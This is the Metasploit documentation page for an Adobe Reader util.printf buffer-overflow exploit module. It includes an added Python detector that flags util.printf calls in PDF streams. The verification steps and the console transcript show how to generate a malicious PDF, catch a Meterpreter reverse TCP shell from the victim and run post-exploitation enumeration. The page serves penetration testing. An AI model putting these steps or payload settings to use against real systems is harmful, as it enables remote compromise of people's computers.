GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/fileformat/adobe_utilprintf.md

Vulnerable Application

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted PDF that contains a malformed util.printf() entry, an attacker may be able to execute arbitrary code.

Link to vulnerable software OldVersion
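
For triage of inbound documents, the following added example (not part of the Metasploit module or its documentation) flags PDFs whose raw bytes or Flate-compressed streams contain a `util.printf(` call. The function names and the benign sample PDF are constructed for illustration; a hit shows only that the call is present, and JavaScript hidden behind other stream filters or obfuscation is not covered.

```python
import re
import zlib

# Raw bytes between "stream" and "endstream" in a PDF object.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# A call to the Acrobat JavaScript function named on this page.
PRINTF_RE = re.compile(rb"util\s*\.\s*printf\s*\(")


def candidate_buffers(pdf_bytes):
    """Yield the raw file, then every stream body that inflates as zlib data."""
    yield "raw", pdf_bytes
    for i, m in enumerate(STREAM_RE.finditer(pdf_bytes)):
        try:
            # decompressobj tolerates a truncated tail, unlike zlib.decompress
            inflated = zlib.decompressobj().decompress(m.group(1))
        except zlib.error:
            continue  # not Flate data; its bytes were already seen in "raw"
        yield f"stream {i} (inflated)", inflated


def find_util_printf(pdf_bytes):
    """Return a (location, snippet) pair for each util.printf( call found."""
    hits = []
    for where, buf in candidate_buffers(pdf_bytes):
        for m in PRINTF_RE.finditer(buf):
            snippet = buf[m.start():m.start() + 60].decode("latin-1")
            hits.append((where, snippet))
    return hits


def constructed_pdf(js, compress):
    """Build a minimal, constructed PDF-like sample carrying `js` in a stream."""
    body = zlib.compress(js) if compress else js
    filt = b"/Filter /FlateDecode " if compress else b""
    return (b"%PDF-1.4\n1 0 obj\n<< /S /JavaScript /JS 2 0 R >>\nendobj\n"
            b"2 0 obj\n<< " + filt + b"/Length " + str(len(body)).encode()
            + b" >>\nstream\n" + body + b"\nendstream\nendobj\n%%EOF\n")


if __name__ == "__main__":
    # Constructed, benign sample: a well-formed call inside a compressed stream.
    sample = constructed_pdf(b'util.printf("%d", 1);', compress=True)
    for where, snippet in find_util_printf(sample):
        print(where, "->", snippet)
```
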

Verification Steps

  1. Install application on the target machine

  2. Start msfconsole

  3. Do: use exploit/windows/fileformat/adobe_utilprintf

  4. Do: set payload [windows/meterpreter/reverse_tcp]

  5. Do: set LHOST [IP]

  6. Do: exploit

  7. Do: use exploit/multi/handler

  8. Do: set LHOST [IP]

  9. Do: exploit

  10. Do: Open PDF on target machine with vulnerable software

Scenarios

Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)

```
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(windows/fileformat/adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/adobe_utilprintf) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(windows/fileformat/adobe_utilprintf) > set FILENAME utilprintf.pdf
FILENAME => utilprintf.pdf
msf exploit(windows/fileformat/adobe_utilprintf) > exploit

[*] Creating 'utilprintf.pdf' file...
[+] utilprintf.pdf stored at /root/.msf4/local/utilprintf.pdf
msf exploit(windows/fileformat/adobe_utilprintf) > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit
msf exploit(multi/handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Sending stage (180291 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1057) at 2019-12-09 13:47:07 -0700

meterpreter > sysinfo
Computer        : COMPUTER_1
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: COMPUTER_1\USER
meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on COMPUTER_1

Installed Applications
======================

 Name            Version
 ----            -------
 Adobe Reader 8  8.0.0

[+] Results stored in: /root/.msf4/loot/20191209134901_default_192.168.1.5_host.application_066854.txt
```